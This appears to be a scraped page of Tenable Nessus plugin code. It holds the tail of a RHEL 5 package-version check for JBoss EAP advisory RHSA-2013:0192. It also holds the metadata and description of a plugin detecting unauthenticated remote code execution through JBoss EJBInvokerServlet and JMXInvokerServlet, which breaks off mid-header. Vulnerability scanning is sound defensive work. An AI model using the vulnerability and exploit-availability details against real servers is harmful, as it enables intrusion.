  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:resteasy-manual");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-util");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-helpers");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-parent");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2-agent");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2-all");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2-aop");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2-beans");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2-context");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2-core");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:wss4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xerces-j2");
  # (the remainder of this plugin is not present on this page)
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-security"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5"); script_set_attribute(attribute:"patch_publication_date", value:"2013/01/24"); script_set_attribute(attribute:"plugin_publication_date", value:"2013/01/24"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof."); script_family(english:"Red Hat Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat"); os_ver = eregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); os_ver = os_ver[1]; if (! ereg(pattern:"^5([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 5.x", "Red Hat " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu); yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo"); if (!empty_or_null(yum_updateinfo)) { rhsa = "RHSA-2013:0192"; yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa); if (!empty_or_null(yum_report)) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : yum_report ); exit(0); } else { audit_message = "affected by Red Hat security advisory " + rhsa; audit(AUDIT_OS_NOT, audit_message); } } else { flag = 0; if (! 
(rpm_exists(release:"RHEL5", rpm:"jbossas-client-"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, "JBoss EAP"); if (rpm_check(release:"RHEL5", reference:"aopalliance-1.0-5.2.jdk6.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"apache-cxf-2.2.12-6.1.patch_04.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"bsh2-2.0-0.b4.15.1.patch01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"bsh2-bsf-2.0-0.b4.15.1.patch01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"glassfish-jaxb-2.1.12-12_patch_03.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"google-guice-2.0-3.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-3.3.2-1.5.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-annotations-3.4.0-3.3.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-annotations-javadoc-3.4.0-3.3.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-entitymanager-3.4.0-4.4.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-entitymanager-javadoc-3.4.0-4.4.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-javadoc-3.3.2-1.5.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-search-3.1.1-2.4.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-search-javadoc-3.1.1-2.4.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hornetq-2.2.24-1.EAP.GA.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", cpu:"i386", reference:"hornetq-native-2.2.20-1.EAP.GA.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"hornetq-native-2.2.20-1.EAP.GA.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jacorb-jboss-2.3.2-2.jboss_1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"javassist-3.12.0-6.SP1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", 
reference:"jboss-aop2-2.1.6-5.CP06.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-bootstrap-1.0.2-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-cache-core-3.2.11-1.GA.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-cache-pojo-3.0.1-1.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-cl-2.0.11-1.GA.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-cluster-ha-server-api-1.2.1-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-common-beans-1.0.1-2.1.Final.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-common-core-2.2.21-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", cpu:"i386", reference:"jboss-eap5-native-5.2.0-6.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"jboss-eap5-native-5.2.0-6.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb-3.0-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-cache-1.0.0-4.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-core-1.3.9-0.4.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-interceptors-1.0.9-0.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-metadata-1.0.0-3.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-security-1.0.2-0.5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-timeout-0.1.1-0.5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-timeout-3.0-api-0.1.1-0.5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-timeout-spi-0.1.1-0.5.ep5.el5")) flag++; if 
(rpm_check(release:"RHEL5", reference:"jboss-ejb3-transactions-1.0.2-1.4.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jacc-1.1-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jad-1.2-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jaspi-1.0-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-javaee-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-javaee-poms-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jca-1.5-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jms-1.1-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jpa-deployers-1.0.0-6.1SP2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-messaging-1.4.8-12.SP9.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-naming-5.0.3-5.1.CP02.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-reflect-2.0.4-2.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-remoting-2.5.4-10.SP4.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-seam2-2.2.6.EAP5-10.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-seam2-docs-2.2.6.EAP5-10.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-seam2-examples-2.2.6.EAP5-10.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-seam2-runtime-2.2.6.EAP5-10.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-security-negotiation-2.1.3-1.GA.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-security-spi-2.0.5-4.SP3_1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el5")) 
flag++; if (rpm_check(release:"RHEL5", reference:"jboss-vfs2-2.2.1-4.GA.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-5.2.0-14.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-client-5.2.0-14.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-hornetq-5.2.0-5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-messaging-5.2.0-14.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-tp-licenses-5.2.0-7.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-ws-cxf-5.2.0-7.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-ws-native-5.2.0-14.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbosssx2-2.0.5-8.SP3_1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossts-4.6.1-12.CP13.8.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossts-javadoc-4.6.1-12.CP13.8.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossweb-2.1.13-2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossweb-lib-2.1.13-2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossws-3.1.2-13.SP15_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossws-common-1.1.0-9.SP10.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossws-framework-3.1.2-9.SP13.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossws-spi-1.1.2-6.SP8.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jgroups-2.6.22-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jopr-embedded-1.3.4-19.SP6.9.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", 
reference:"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jopr-jboss-as-5-plugin-3.0.0-14.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", cpu:"i386", reference:"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"netty-3.2.5-6.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"picketlink-federation-2.1.5-3.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"picketlink-quickstarts-2.1.5-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"picketlink-quickstarts-idp-2.1.5-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"picketlink-quickstarts-pdp-2.1.5-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"picketlink-quickstarts-sts-2.1.5-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"resteasy-1.2.1-18.CP02_patch02.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"resteasy-examples-1.2.1-18.CP02_patch02.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"resteasy-javadoc-1.2.1-18.CP02_patch02.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"resteasy-manual-1.2.1-18.CP02_patch02.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rh-eap-docs-5.2.0-6.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", 
reference:"rh-eap-docs-examples-5.2.0-6.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-ant-bundle-common-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-common-parent-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-client-api-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-comm-api-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-dbutils-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-domain-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-gui-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-native-system-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-parent-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-plugin-api-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-plugin-container-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-plugindoc-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-util-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-filetemplate-bundle-common-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-helpers-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-jboss-as-common-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-modules-parent-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-parent-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if 
(rpm_check(release:"RHEL5", reference:"rhq-platform-plugin-3.0.0-14.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-plugin-validator-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-pluginAnnotations-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-pluginGen-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-plugins-parent-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-rtfilter-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-agent-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-all-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-aop-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-beans-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-context-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-core-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"wss4j-1.5.12-4.1_patch_02.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xerces-j2-2.9.1-10.patch02.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xerces-j2-scripts-2.9.1-10.patch02.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el5")) flag++; if 
(rpm_check(release:"RHEL5", reference:"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-security-1.5.1-2.ep5.el5")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() + redhat_report_package_caveat() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "aopalliance / apache-cxf / bsh2 / bsh2-bsf / glassfish-jaxb / etc"); } }
NASL family: CGI abuses
NASL id: JMXINVOKERSERVLET_EJBINVOKERSERVLET_RCE.NASL
description: The
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 70414
published: 2013-10-14
reporter: This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/70414
title: Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities
code:

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(70414);
  script_version("1.22");
  script_cvs_date("Date: 2019/11/27");

  script_cve_id("CVE-2007-1036", "CVE-2012-0874", "CVE-2013-4810");
  script_bugtraq_id(57552, 62854, 77037);
  script_xref(name:"CERT", value:"632656");
  script_xref(name:"EDB-ID", value:"16318");
  script_xref(name:"EDB-ID", value:"21080");
  script_xref(name:"EDB-ID", value:"28713");
  script_xref(name:"EDB-ID", value:"30211");
  script_xref(name:"ZDI", value:"ZDI-13-229");
  script_xref(name:"HP", value:"HPSBGN02952");
  script_xref(name:"HP", value:"SSRT101127");
  script_xref(name:"HP", value:"emr_na-c04041110");

  script_name(english:"Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities");
  script_summary(english:"Attempts to access the servlets without credentials.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on the
web server on the remote host are accessible to unauthenticated users.
The remote host is, therefore, affected by the following
vulnerabilities :

  - A security bypass vulnerability exists due to improper
    restriction of access to the console and web management
    interfaces. An unauthenticated, remote attacker can
    exploit this, via direct requests, to bypass
    authentication and gain administrative access.
    (CVE-2007-1036)

  - A remote code execution vulnerability exists due to the
    JMXInvokerHAServlet and EJBInvokerHAServlet invoker
    servlets not properly restricting access to profiles. An
    unauthenticated, remote attacker can exploit this to
    bypass authentication and invoke MBean methods,
    resulting in the execution of arbitrary code.
    (CVE-2012-0874)

  - A remote code execution vulnerability exists in the
    EJBInvokerServlet and JMXInvokerServlet servlets due to
    the ability to post a marshalled object. An
    unauthenticated, remote attacker can exploit this, via a
    specially crafted request, to install arbitrary
    applications. Note that this issue is known to affect
    McAfee Web Reporter versions prior to or equal to version
    5.2.1 as well as Symantec Workspace Streaming version
    7.5.0.493 and possibly earlier. (CVE-2013-4810)");
  # https://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?74979c27");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-229/");
  # https://web.archive.org/web/20131031213751/http://retrogod.altervista.org/9sg_ejb.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?52567bc1");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2013/Oct/126");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/530241/30/0/threaded");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2013/Dec/att-133/ESA-2013-094.txt");
  script_set_attribute(attribute:"solution", value:
"If using EMC Data Protection Advisor, either upgrade to version 6.x or
apply the workaround for 5.x. Otherwise, contact the vendor or remove
any affected JBoss servlets.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'JBoss JMX Console Deployer Upload and Execute');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_exploithub", value:"true");
  script_set_attribute(attribute:"exploithub_sku", value:"EH-13-606");
  script_cwe_id(264);

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/09/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/10/14");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:procurve_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:application_lifecycle_management");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:identity_driven_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_web_platform");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_application_platform");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_brms_platform");
